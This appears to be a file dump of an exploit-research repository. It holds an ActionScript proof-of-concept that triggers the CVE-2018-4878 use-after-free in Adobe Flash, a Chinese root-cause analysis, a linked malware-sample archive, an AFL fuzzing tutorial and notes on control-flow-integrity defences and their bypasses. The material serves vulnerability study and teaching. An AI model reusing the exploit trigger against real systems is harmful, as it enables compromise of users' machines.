https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/File Format Vulnerability/CVE-2018-4878/CVE-2018-4878-master.zip -------------------------------------------------------------------------------- /File Format Vulnerability/CVE-2018-4878/CVE-2018-4878.rar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/File Format Vulnerability/CVE-2018-4878/CVE-2018-4878.rar -------------------------------------------------------------------------------- /File Format Vulnerability/CVE-2018-4878/Poc/CVE-2018-4878漏洞分析.docx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/File Format Vulnerability/CVE-2018-4878/Poc/CVE-2018-4878漏洞分析.docx -------------------------------------------------------------------------------- /File Format Vulnerability/CVE-2018-4878/Poc/Poc.as3proj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 58 | 59 | -------------------------------------------------------------------------------- /File Format Vulnerability/CVE-2018-4878/Poc/bin/Poc.swf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/File Format Vulnerability/CVE-2018-4878/Poc/bin/Poc.swf -------------------------------------------------------------------------------- /File Format Vulnerability/CVE-2018-4878/Poc/bin/expressInstall.swf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/File Format Vulnerability/CVE-2018-4878/Poc/bin/expressInstall.swf -------------------------------------------------------------------------------- /File Format Vulnerability/CVE-2018-4878/Poc/bin/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Poc 6 | 7 | 8 | 9 | 29 | 33 | 34 | 35 |
36 |

Poc

37 |

Get Adobe Flash player

38 |
39 | 40 | -------------------------------------------------------------------------------- /File Format Vulnerability/CVE-2018-4878/Poc/obj/PocConfig.old: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 25.0 6 | false 7 | true 8 | 9 | 10 | CONFIG::debug 11 | true 12 | 13 | 14 | CONFIG::release 15 | false 16 | 17 | 18 | CONFIG::timeStamp 19 | '2018/3/15' 20 | 21 | 22 | CONFIG::air 23 | false 24 | 25 | 26 | CONFIG::mobile 27 | false 28 | 29 | 30 | CONFIG::desktop 31 | false 32 | 33 | true 34 | 35 | C:\Users\五千年木\Desktop\新建文件夹\Poc\src 36 | E:\专业软件\FlashDevelop-5.3.3\Library\AS3\classes 37 | 38 | 39 | 40 | C:\Users\五千年木\Desktop\新建文件夹\Poc\src\Poc\Main.as 41 | 42 | #FFFFFF 43 | 30 44 | 45 | 800 46 | 600 47 | 48 | -------------------------------------------------------------------------------- /File Format Vulnerability/CVE-2018-4878/Poc/obj/PocConfig.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 25.0 6 | false 7 | true 8 | 9 | 10 | CONFIG::debug 11 | true 12 | 13 | 14 | CONFIG::release 15 | false 16 | 17 | 18 | CONFIG::timeStamp 19 | '2018/3/15' 20 | 21 | 22 | CONFIG::air 23 | false 24 | 25 | 26 | CONFIG::mobile 27 | false 28 | 29 | 30 | CONFIG::desktop 31 | false 32 | 33 | true 34 | 35 | C:\Users\五千年木\Desktop\新建文件夹\Poc\src 36 | E:\专业软件\FlashDevelop-5.3.3\Library\AS3\classes 37 | 38 | 39 | 40 | C:\Users\五千年木\Desktop\新建文件夹\Poc\src\Poc\Main.as 41 | 42 | #FFFFFF 43 | 30 44 | 45 | 800 46 | 600 47 | 48 | -------------------------------------------------------------------------------- /File Format Vulnerability/CVE-2018-4878/Poc/src/Poc/Main.as: -------------------------------------------------------------------------------- 1 | package Poc 2 | { 3 | import flash.display.FrameLabel; 4 | import flash.display.Sprite; 5 | import flash.events.Event; 6 | import com.adobe.tvsdk.mediacore.*; 7 | import flash.events.TimerEvent; 8 | import flash.net.LocalConnection; 9 | import flash.utils.ByteArray; 10 | import flash.external.ExternalInterface; 11 | import flash.utils.Timer; 12 | import flash.text.TextField; 13 | 14 | /** 15 | * ... 16 | * @author 五千年木 17 | */ 18 | public class Main extends Sprite 19 | { 20 | var danglingpointer :MyListener = null; 21 | var mediaplayer :MediaPlayer = null; 22 | var listener :MyListener = null; 23 | var timer :Timer = null; 24 | 25 | // Used to trigger UAF 26 | public function triggeruaf() : void { 27 | var sdk :PSDK = null; 28 | var dispatch:PSDKEventDispatcher = null; 29 | 30 | sdk = PSDK.pSDK; 31 | dispatch = sdk.createDispatcher(); 32 | 33 | this.mediaplayer = sdk.createMediaPlayer(dispatch); 34 | this.listener = new MyListener(); 35 | this.mediaplayer.drmManager.initialize(this.listener); 36 | this.listener = null; 37 | } 38 | 39 | 40 | public function exploit():void { 41 | 42 | this.triggeruaf(); 43 | 44 | try { 45 | new LocalConnection().connect("test"); 46 | new LocalConnection().connect("test"); 47 | } catch (e:Error) { 48 | } 49 | } 50 | 51 | 52 | public function Main() 53 | { 54 | if (stage) init(); 55 | else addEventListener(Event.ADDED_TO_STAGE, init); 56 | } 57 | 58 | private var log :TextField = new TextField(); 59 | public function AddToLog(text :String) : void { 60 | this.log.text += "\n" + text; 61 | } 62 | private function init(e:Event = null):void 63 | { 64 | removeEventListener(Event.ADDED_TO_STAGE, init); 65 | // entry point 66 | this.log.width = 400; 67 | this.log.height = 1500; 68 | this.log.x = 0; 69 | this.log.y = 0; 70 | this.addChild(this.log); 71 | 72 | AddToLog("CVE-2018-4878 POC, by 五千年木\n"); 73 | 74 | exploit(); 75 | return; 76 | } 77 | 78 | } 79 | 80 | } -------------------------------------------------------------------------------- /File Format Vulnerability/CVE-2018-4878/Poc/src/Poc/MyListener.as: -------------------------------------------------------------------------------- 1 | package Poc 2 | { 3 | import com.adobe.tvsdk.mediacore.DRMOperationCompleteListener; 4 | import flash.utils.ByteArray; 5 | /** 6 | * ... 7 | * @author 五千年木 8 | */ 9 | public class MyListener implements DRMOperationCompleteListener 10 | { 11 | var a1:uint = 0x31337; 12 | var a2:uint = 0x31337; 13 | var a3:uint = 0x31337; 14 | var a4:uint = 0x31337; 15 | var a5:uint = 0x31337; 16 | var a6:uint = 0x31337; 17 | var a7:uint = 0x31337; 18 | var a8:uint = 0x31337; 19 | var a9:uint = 0x31337; 20 | var a10:uint = 0x31337; 21 | var a11:uint = 0x31337; 22 | var a12:uint = 0x31337; 23 | var a13:uint = 0x31337; 24 | var a14:uint = 0x31337; 25 | var a15:uint = 0x31337; 26 | var a16:uint = 0x31337; 27 | var a17:uint = 0x31337; 28 | var a18:uint = 0x31337; 29 | var a19:uint = 0x31337; 30 | var a20:uint = 0x31337; 31 | var a21:uint = 0x31337; 32 | var a22:uint = 0x31337; 33 | var a23:uint = 0x31337; 34 | var a24:uint = 0x31337; 35 | var a25:uint = 0x31337; 36 | var a26:uint = 0x31337; 37 | var a27:uint = 0x31337; 38 | var a28:uint = 0x31337; 39 | var a29:uint = 0x31337; 40 | var a30:uint = 0x31337; 41 | var a31:uint = 0x31337; 42 | var a32:uint = 0x31337; 43 | var a33:uint = 0x31337; 44 | var a34:uint = 0x31337; 45 | public function MyListener() 46 | { 47 | super(); 48 | } 49 | public function onDRMOperationComplete():void { 50 | trace("IN COMPLETE"); 51 | } 52 | 53 | public function onDRMError(major:uint, minor:uint, errorString:String, errorServerUrl:String):void { 54 | trace("IN ERROR"); 55 | } 56 | } 57 | 58 | } -------------------------------------------------------------------------------- /File Format Vulnerability/CVE-2018-4878/analysis.md: -------------------------------------------------------------------------------- 1 | ## 漏洞成因 2 | 3 | poc 4 | 5 | public function triggeruaf() : void { 6 | 7 | var sdk :PSDK = null; 8 | 9 | var dispatch:PSDKEventDispatcher = null; 10 | 11 | 12 | sdk = PSDK.pSDK; 13 | 14 | dispatch = sdk.createDispatcher(); 15 | 16 | 17 | this.mediaplayer = sdk.createMediaPlayer(dispatch); 18 | 19 | this.listener = new MyListener(); 20 | 21 | this.mediaplayer.drmManager.initialize(this.listener); 22 | 23 | this.listener = null; 24 | 25 | } 26 | 27 | 28 | public function exploit():void { 29 | 30 | this.triggeruaf(); 31 | 32 | try { 33 | 34 | new LocalConnection().connect("test"); 35 | 36 | new LocalConnection().connect("test"); 37 | 38 | } catch (e:Error) { 39 | 40 | } 41 | 42 | } 43 | 44 | 在this.listener对象free之后,this.mediaplayer对象中还存着它的指针,存在悬挂指针漏洞 -------------------------------------------------------------------------------- /File Format Vulnerability/CVE-2018-4878/malware-samples-36a4c97289c32de81d6ba0565f00571dceac92f6.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/File Format Vulnerability/CVE-2018-4878/malware-samples-36a4c97289c32de81d6ba0565f00571dceac92f6.zip -------------------------------------------------------------------------------- /Fuzzer/AFL初探.md: -------------------------------------------------------------------------------- 1 | ## 原理 2 | 3 | AFL采用代码插桩的方法,对遗传算法进行指导,提高代码覆盖率。具体说来,插桩代码把当前地址放到一个全局变量中,类似一个hashmap的地图,设置遗传算法,能够产生不同路径的地图优先度高。 4 | 5 | 对中afl-gcc编译的crash可执行文件的反汇编,可以看到有一些__afl_maybe_log插桩代码。 6 | 7 | ## AFL工作流程 8 | 9 | Fuzz流程: 10 | 11 | 1.读取输入的初始testcase, 将其放入到queue中; 12 | 2.从queue中读取内容作为程序输入; 13 | 3.尝试在不影响流程的情况下精简输入; 14 | 4.对输入进行自动突变; 15 | 5.如果突变后的输入能够有新的状态转移,将修改后的输入放入queue中; 16 | 6.回到2。 17 | 18 | ## 对代码进行插桩 19 | 20 | 在使用AFL 编译工具 afl-gcc对源码进行编译时,程序会使用afl-as工具对编译并未汇编的c/c++代码进行插桩。过程如下: 21 | 22 | 1.afl-as.h定义了被插入代码中的汇编代码; 23 | 2.afl-as逐步分析.s文件(汇编代码),检测代码特征并插入桩。 24 | 25 | 过程如下图所示: 26 | 27 | ![](./afl1.png) 28 | 29 | 过程描述: 30 | 31 | 1.编译预处理程序对源文件进行预处理,生成预处理文件(.i文件) 32 | 2.编译插桩程序对.i文件进行编译,生成汇编文件(.s文件),afl同时完成插桩 33 | 3.汇编程序(as)对.s文件进行汇编,生成目标文件(.o文件) 34 | 4.链接程序(ld)对.o文件进行连接,生成可执行文件(.out/.elf文件) 35 | 36 | 当然llvm/clang插桩方式是另外的一套机制,通过修改LLVM IR(中间语言)实现。 37 | 38 | ## AFL编译程序 39 | 40 | $ CC=/path/to/afl/afl-gcc ./configure 41 | $ make clean all C++ 程序, 设置 CXX=/path/to/afl/afl-g++. 42 | 43 | AFL编译链接可执行文件和库文件时,建议使用static link(静态链接库,libxxx.a文件),当使用动态链接库时,将动态链接库(如当前目录)加到环境变量中:export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:. 44 | 45 | ## 选择初始化用例 46 | 47 | 1.保证文件足够小,fuzzing测试速度不至于太慢; 48 | 2.选取不同的testcase时,选取不同类型的testcase。 49 | 3.使用afl-cmin精简testcase 50 | 51 | 如果测试用例导致afl-fuzz速度慢,可以使用LLVM-based mode(compile with clang),可以提速两倍,或者使用 -d option 52 | 53 | ## Fuzzing Binaries 54 | 55 | ./afl-fuzz -i testcase_dir -o findings_dir /path/to/program @@ 56 | 57 | -m 设置内存限制,当不限内存时,set -m none 58 | -f xxx 当一个程序读取文件名固定时,set -f xxx(xxx为文件名) 59 | -t 当fuzzing的程序数据交互时间较长,set -t xxx(xxx为超时时间) 60 | 61 | ## 输出目录说明 62 | 63 | queue/ - 每个独特执行路径的测试用例,以及用户给出的所有起始文件。这是第2节中提到的合成语料库。在将此语料库用于任何其他用途之前, 64 | 可以使用afl-cmin工具将其缩小为较小的大小。该工具将找到提供等效边缘覆盖率的较小文件子集。 65 | 66 | crashes / - 导致测试程序收到致命信号的独特测试用例(例如,SIGSEGV,SIGILL,SIGABRT)。条目按接收到的信号分组。 67 | 68 | hangs/ - 导致测试程序超时的唯一测试用例。在东西被分类为挂起之前的默认时间限制是1秒和-t参数的值中较大的一个。该值可以通过设置AFL_HANG_TMOUT 69 | 进行微调,但这很少需要。 70 | 71 | 在crash文件夹,找到令程序崩溃的输入。 72 | 73 | 如果需要重新开始AFL Fuzzing时,删除output文件夹,或者指定另外的输出文件夹 74 | 如果需要继续已经停止的AFL Fuzzing测试,使用 afl-fuzz -i-(如:./afl-fuzz -i- -o findings_dir /path/to/program @@)来继续Fuzzing。 75 | 76 | ## 并行Fuzzing测试 77 | 78 | 每个afl-fuzz进程占据CPU的一个核,也就是说如果是多核的主机,AFL就可以并行工作,并行模式也为AFL与其他Fuzzing工具、符号执行引擎(symbolic or concolic execution engines)交互提供了便利。 79 | 80 | ## 验证Crash 81 | 82 | 如果程序Fuzzing过程发生crash,那么会在afl/output/crash文件夹下记录引发crash的输入文件,使用gdb单步调试可以定位引发崩溃的代码位置。但是有些比较复杂的程序利用gdb可能比较难定位问题,使用-C option。 83 | 84 | ## LLVM Mode 85 | 86 | LLVM Mode(afl-clang)模式编译程序Fuzzing速度是afl-gcc模式的2倍,但是使用此模式必须先安装llvm套件,参见learning LLVM project — clang,配置LLVM_CONFIG(export LLVM_CONFIG=`which llvm-config`),然后在afl/llvm_mode/文件夹下执行make,会在afl/目录下生成afl-clang-fast/afl-clang-fast++。 使用afl-clang-fast编译C程序: 87 | 88 | $CC=/path/to/afl/afl-clang-fast ./configure [...options...] 89 | $make 90 | 91 | 最后还是会调用clang/clang++来编译程序,在编译程序时会检查编译选项(makefile中的CFLAGS),clang提供很多内存检查的工具如ASAN/MSAN/UBSAN等,以及afl编译选项AFL_QUIET(Qemu模式),这些选项可以直接填写进makefile的编译选项也可以设置到环境变量中,afl-gcc/afl-clang在开始编译前会检查这些环境变量。 92 | 93 | 环境变量设置详情见:env_variables.txt 94 | 95 | ## ASAN结合使用 96 | 97 | ASAN/MSAN/UBSAN原本输入clang编译器选项,后来在高版本的gcc中集成。在发现内存问题中ASAN/MSAN/UBSAN发挥着重要的作用。有大牛表示:“AFL Fuzzing without ASAN is just a waste of CPU”。 98 | 99 | 使用ASAN方法: 100 | 101 | set AFL_USE_ASAN=1 before calling ‘make clean all’ 102 | add -fsanitize=address option into makefile 103 | 104 | 使用ASAN编译选项尽量编译成32位系统程序(-m32), 因为Address Sanitize使用Shadow Memory机制,在32机器上需要大约800M的内存,但是在x86_64系统上需要大约20TB的内存。 105 | 106 | ## Qemu Mode 107 | 108 | 在无源码的情况下Fuzzing二进制文件,详细请参见afl/qemu_mode/README.qemu 109 | 110 | ## 总结 111 | 112 | AFL许多技术细节很有意思,设计思想也很巧妙,灵活使用必定能发现很多漏洞。本文多次提到ASAN/MSAN等工具,后续将更加详细讲解AFL+ASAN结合使用,此乃当前白盒测试领域的神器。 113 | 114 | 115 | ## persistent mode 116 | 117 | The LLVM mode also offers a “persistent”, in-process fuzzing mode that can work well for certain types of self-contained libraries, and for fast targets, can offer performance gains up to 5-10x; and a “deferred fork server” mode that can offer huge benefits for programs with high startup overhead. Both modes require you to edit the source code of the fuzzed program, but the changes often amount to just strategically placing a single line or two. 118 | 119 | ## 持久化模式 120 | 121 | Some libraries provide APIs that are stateless, or whose state can be reset in between processing different input files. When such a reset is performed, a single long-lived process can be reused to try out multiple test cases, eliminating the need for repeated fork() calls and the associated OS overhead. 122 | 123 | The basic structure of the program that does this would be: 124 | 125 | while (__AFL_LOOP(1000)) { 126 | 127 | /* Read input data. */ 128 | /* Call library code to be fuzzed. */ 129 | /* Reset state. */ 130 | 131 | } 132 | 133 | /* Exit normally */ 134 | 135 | The numerical value specified within the loop controls the maximum number of iterations before AFL will restart the process from scratch. This minimizes the impact of memory leaks and similar glitches; 1000 is a good starting point, and going much higher increases the likelihood of hiccups without giving you any real performance benefits. -------------------------------------------------------------------------------- /Fuzzer/afl1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Fuzzer/afl1.png -------------------------------------------------------------------------------- /Fuzzer/eu-16-Jurczyk-Effective-File-Format-Fuzzing-Thoughts-Techniques-And-Results.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Fuzzer/eu-16-Jurczyk-Effective-File-Format-Fuzzing-Thoughts-Techniques-And-Results.pdf -------------------------------------------------------------------------------- /Fuzzer/post_fuzzing-reader-wtf.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Fuzzer/post_fuzzing-reader-wtf.png -------------------------------------------------------------------------------- /Fuzzer/the_art_of_fuzzing_slides.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Fuzzer/the_art_of_fuzzing_slides.pdf -------------------------------------------------------------------------------- /History/CFI/CFI.md: -------------------------------------------------------------------------------- 1 | ## ref: 2 | 3 | https://hacpai.com/article/1525755052437(控制流完整性(CFI)发展简述) 4 | https://hacpai.com/article/1524800332729 (Data-Oriented Programming) 5 | http://jcs.iie.ac.cn/ch/reader/create_pdf.aspx?file_no=20170407&year_id=2017&quarter_id=4&falg=1(内存数据污染攻击和防御综述) 6 | 7 | ### CFI(控制流完整性) 8 | 9 | 控制流完整性 CFI 的核心思想是依据静态分析,获得程序的控制流图(Control-Flow Graph, CFG), 计算出所有和控制流相关的数据, 即间接转移指令合法的目的地址, 然后通过二进制重写技术在 CFG路径上添加标记, 最后严格要求程序依照 CFG 执行 10 | 11 | ### CPI(代码指针完整性) 12 | 13 | 代码指针完整性 CPI 的核心思想是把进程的内存空间划分为安全区域和常规区域, 敏感的指针数据存放在安全区中, 只有安全的指针操作才能访问安全区的规则, 以此达到保护敏感指针数据不被劫持的目的 14 | 15 | CPI 的实现方法是通过源码的插桩技术,在编译时分析出程序需要保护的敏感指针对象, 并把这些敏感指针替换为符合 CPI 要求的安全指针, 16 | 再使用安全指针去访问安全的内存区域。作者同时还提出了一种条件相对宽松的机制, 代码指针分离(Code-Pointer Separation, CPS),它减少了安全区域的大小以及敏感代码指针的数量和质量, 因此大大降低了开销。 17 | 18 | ## 传统代码重用攻击 VS 基于特征的启发式防御 19 | 20 | 基于特征的启发式防御 21 | 22 | ### 基于指令执行特征检测的防御思想 23 | 24 | 基于统计规律和启发式学习来判断程序运行过程中的配件数量是否超过一定的阈值, 以 25 | 此区分程序的正常或攻击行为。文章的核心思想是首先识别 Ret 指令, 然后判断它的目的地址是否指向 26 | 系统中的 libc 库, 除此之外还要记录从 Ret 指令目的地址开始的连续配件数量以及每个配件包含的指令 27 | 条数, 用上面的统计结果来检测程序是否运行了ROP 恶意代码。 28 | 29 | ### 影子栈(Shadow Stack) 30 | 31 | 影子栈的核心思想是每次程序执行 call 指令时, 除了把函数返回地址压栈外, 额外 32 | 再复制一份返回地址存入可信的影子栈中, 每次栈顶执行 Ret 指令时, 需要先比较常规栈和影子栈的栈 33 | 顶值是否相同, 如果不相同则表示为异常行为并终止程序执行。 34 | 35 | 影子栈主要问题在于无法防御JOP 攻击, 原因在于 JOP 使用的攻击配件是以 Jmp指令为结尾的指令片段。除此之外, 还必须保证影子栈作为可信基的前提, 一旦影子栈中的内容被篡改,攻击者也就能够绕过检测机制了. 36 | 37 | ### 使用加锁(locking)结合 CFI的思想 38 | 39 | 使用加锁(locking)结合 CFI的思想来弥补影子栈的不足同时又降低 CFI 的性能开销。在编译时添加锁信息相 40 | 关的段(section), 在链接时构造函数调用关系图, 在执行间接分支指令前根据锁的状态值和函数调用关系图来决定是否违反策略。 41 | 42 | ### 指令进行对齐 43 | 44 | 认为程序控制流被劫持的部分原因在于x86 指令集较为紧密, 没有进行对齐处理, 就导致了从不同的位置读取字节, 得到的指令不一样, 于是 45 | 就产生了无意识配件 46 | 47 | 通过修改编译器, 强制将指令进行对齐, 从而使生成的二进制代码中不包括无意识配件。 48 | 49 | ### 计算间接分支指令的密度 50 | 51 | 通过计算间接分支指令的密度来检测ROP攻击的方法,结果显示 ROP 攻击程序中确实存在较高的间接分支 52 | 指令密度, 就文章中的 benchmarks 来说, 可以确定一个通用的阈值为每 32 条指令中存在 13 条以上的 53 | 间接指令, 则认定为恶意攻击的发生 54 | 55 | ## CFI 发展 VS 新型重用攻击 56 | 57 | CFI 发展 58 | 59 | ### CCFIR 60 | 61 | CCFIR是一种对粗粒度 CFI 思想的软件实现方案。首先通过重定位表来分析每个模块中所有间 62 | 接分支指令的可能目的地址集合, 然后重写二进制文件增加一个跳转代码段(segment), 最后在程序运 63 | 行时, 要求所有的间接转移指令转向这个跳转代码段, 再完成控制流的转移, 跳转代码段会去判断这 64 | 些间接转移指令的目标地址是否在合法的集合内,如果不在就认为是异常情况。 65 | 66 | 系统策略从控制转移指令的角度分为三类: 67 | 第一, 间接Call和Jmp指令强制规定只能跳转到函数的开头, 并且目标地址都使用 8 字节对齐, 以此最大可能地消除无意识配件的存在; 68 | 第二, 常规函数不能调用系统敏感函数的地址, 但敏感函数可以调用常规函数的地址; 69 | 第三, 跳转代码段需要通过随机化的方式, 在载入内存时隐藏地址布局。 70 | 71 | ### ROPGuard 72 | 73 | ROPGuard提出在敏感系统调用(例如 mprotect(), execve(), bind()等)触发时, 基于 74 | 一些启发式算法, 动态监控 ROP 的攻击特征, 从而判断是否存在异常情况 75 | 76 | ### KBouncer 77 | 78 | KBouncer是首次提出使用 intel 处理器自带硬件机制的防御思想, 这个硬件 79 | 机制就是最近分支记录(Last Branch Recording, LBR),它是一种循环寄存器组, 可以记录程序最近的十六 80 | 条跳转指令信息, 并且它的定制性很强, 可以过滤掉不重要的分支而只关注重点的跳转。KBouncer 只 81 | 检查最近十六个执行系统调用的分支信息, 82 | 83 | 然后设定两个规则: 84 | 其一是 Ret 指令的返回地址必须是call-preceded 地址, 85 | 其二是检查最近 8 个间接分支指令是否具备配件的特征, 违反任意一种都会被认为是攻击行为 86 | 87 | ### ROPecker 88 | 89 | ROPecker是一种通用, 不需要源码,且非常高效的防御机制, 它不仅能防御 ROP 形式的 90 | 攻击, 还能抵御 JOP 攻击。ROPecker 首先对程序进行离线的分析, 并使用硬件 LBR 寄存器记录执行流 91 | 的分支信息, 然后依据攻击行为通常会在代码段进行大幅度跳转的特性, 在程序运行时使用滑动窗口 92 | (sliding window)的思想限制分支指令的跳转距离,即不在当前窗口范围内的代码变为不可执行状态, 93 | 一旦分支指令跳转到窗口以外的地址便会触发分析例程, 而分析例程会基于离线的配件统计结果, 对 94 | 有风险的指令片段(十一个连续的配件被认为是危险的)进行报警处理。 95 | 96 | 新型重用攻击 97 | 98 | ### 有效绕过粗粒度 CFI 的 ROP 攻击方法 99 | 100 | 第一,call-precededROP:在不违反call-preceded原则的情况下仍然可以实现ROP攻击,它只用call-preceded 101 | 配件,并且让配件序列变得复杂冗长,使得可以满足执行Ret指令之后跳转到一个call-preceded指令的地址; 102 | 第二, 躲避攻击(Evasion Attacks)在配件序列中添加一些 NOP 指令, 从而伪装成正常的指令串那么就可以构造长短结合的配件来绕过基于配件长 103 | 度特征的防御检测 104 | 第三是刷新历史记录攻击(History Flushing), 既然一些防御方法是依据程序中分支指令执行的历史信息来检查未来执行流是否异 105 | 常, 那么就可以通过添加NOP指令(无关的间接Jmp)使得防御机制无法维持有效的历史记录, 从而绕过检查策略。 106 | 107 | 结合以上三种攻击方法, 就可以有效绕过CCFIR、DROP、ROPDfender、KBouncer、ROPekcer等基于启发式或粗粒度 CFI 思想的防御机制。 108 | 109 | 防御机制升级 110 | 111 | ### PathArmor 112 | 113 | 即 CFI 的思想结合上下文敏感的关系来增强防御能力。根据程序上下文敏感的静态分析 114 | 和二进制插桩技术, 在目标文件的控制流路径中添加上下文敏感的控制流标记, 把控制流标记和 CFG 115 | 中的控制流关系联系在一起, 展示了一个可应用于实际程序高效且上下文敏感的 CFI 方案 116 | 117 | ### Lockdown 118 | 119 | 提出了二进制级别的细粒度, 模块化, 动态 CFI 原型系统 Lockdown, 使用共享库的符号表和 CFG, 使用 120 | 更为细致的前向控制流转移规则以及影子栈的后向转移保护, 以此来防御所有类型的代码重用攻击。 121 | 122 | 细粒度 CFI 的弱点 123 | 124 | 第一, 当发生函数调用时, 调用函数会将当前使用到的寄存器值压入栈中, 以便函数返回时还原现场, 125 | 于是就给攻击者提供了机会, 如果他们能够篡改栈上保存的寄存器的值, 那么系统还原现场后就会导致 CFI 的检测失效; 126 | 第二, 用户态的 CFI 仅仅插桩用户模式的函数调用, 而不涉及系统内核的函数调用,当一个系统调用返回时, 内核会从用户栈上读取返 127 | 回地址, 然后跳转到用户代码的执行位置, 但是 CFI并不会去检测这个返回值, 因此存在被攻击得可能。 128 | 一条线程连续地进行系统调用, 另外一条线程持续地修改系统调用的返回地址, 就可以完成劫持的目的; 129 | 第三, 影子栈和常规栈之间存在一个常数偏移量, 因此攻击者可以通过任意地址写漏洞, 在常规栈基址的基础上, 计算得出影子栈的地址, 从而篡 130 | 改影子栈的数据来绕过 CFI 检测。 131 | 132 | ### ACICS 133 | 134 | 一种控制流劫持攻击的新型配件, 称之为 ACICS(argument corruptible indirect call sites)配件, 它是由 135 | 成对的间接函数调用指令以及能够启用远程执行代码的函数组成, 同时又符合源程序的 CFG 逻辑。文章认为同时满足健壮性和精确性的 CFG 难以构建,因此使用不完整指针分析构造出的 CFG 存在漏洞,间接证明了 ACICS 配件的攻击有效性。 136 | 137 | ### COOP(Counterfeit Object-oriented Programming) 138 | 139 | 专门针对 C++应用程序中虚函数表的劫持攻击思想。 140 | 文章通过建立虚假对象, 劫持已经存在的 C++虚函数表, 利用漏洞程序中的主循环配件(具备循环功能的 141 | 指令片段)反复调用以函数为粒度的功能配件, 直到完成攻击目的。 142 | 143 | 防御COOP 144 | 145 | ### TypeArmor 146 | 147 | 使用 use-def 数据流分析算法,在二进制级别构造间接函数调用目的地址的合法集 148 | 合, 从而阻止使用以函数为粒度的功能配件。另外经典的CPI也提供了防御COOP攻击的方法, 它通过保 149 | 护虚函数表指针不被恶意修改, 从源头上防御了针对 C++虚函数表劫持的攻击。 150 | 151 | ## CPI VS 信息泄露攻击 152 | 153 | -------------------------------------------------------------------------------- /History/Images/after.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/History/Images/after.png -------------------------------------------------------------------------------- /History/Images/aslr.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/History/Images/aslr.png -------------------------------------------------------------------------------- /History/Images/before.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/History/Images/before.png -------------------------------------------------------------------------------- /History/Images/bypass.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/History/Images/bypass.png -------------------------------------------------------------------------------- /History/Images/cfg.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/History/Images/cfg.png -------------------------------------------------------------------------------- /History/Images/dep-kernel.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/History/Images/dep-kernel.png -------------------------------------------------------------------------------- /History/Images/dep.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/History/Images/dep.png -------------------------------------------------------------------------------- /History/Images/dkohm.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/History/Images/dkohm.png -------------------------------------------------------------------------------- /History/Images/exec.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/History/Images/exec.png -------------------------------------------------------------------------------- /History/Images/gs1.0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/History/Images/gs1.0.png -------------------------------------------------------------------------------- /History/Images/gs1.1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/History/Images/gs1.1.png -------------------------------------------------------------------------------- /History/Images/gs2.0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/History/Images/gs2.0.png -------------------------------------------------------------------------------- /History/Images/guard.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/History/Images/guard.png -------------------------------------------------------------------------------- /History/Images/heap.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/History/Images/heap.png -------------------------------------------------------------------------------- 